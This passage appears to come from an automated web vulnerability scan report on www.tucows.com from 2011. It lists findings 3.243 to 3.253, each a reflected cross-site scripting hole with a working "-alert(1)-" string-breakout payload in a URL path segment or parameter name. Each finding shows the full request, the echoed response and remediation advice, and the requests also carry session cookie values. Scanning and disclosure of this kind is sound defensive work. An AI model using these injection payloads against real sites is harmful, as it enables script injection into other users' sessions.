3.243. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10ba"-alert(1)-"8abc5e611cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.html?c10ba"-alert(1)-"8abc5e611cd=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/contact.html?c10ba"-alert(1)-"8abc5e611cd=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.244. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d2e"-alert(1)-"560230630e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images39d2e"-alert(1)-"560230630e8/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images39d2e"-alert(1)-"560230630e8/newassets/contact.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.245. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40764"-alert(1)-"3559dd93eff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets40764"-alert(1)-"3559dd93eff/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets40764"-alert(1)-"3559dd93eff/contact.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.246. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffcf"-alert(1)-"e9260562356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/contact.html3ffcf"-alert(1)-"e9260562356 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/contact.html3ffcf"-alert(1)-"e9260562356";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.247. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c0c"-alert(1)-"83c957dbfec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.248. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe9d"-alert(1)-"8324c4abd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.249. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87e88"-alert(1)-"29fef7fc009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.250. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff73f"-alert(1)-"c3006f1651f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.251. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e6b"-alert(1)-"3078349caa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.252. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a3c"-alert(1)-"0443944911d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.253. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199e2"-alert(1)-"fac9720e4d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
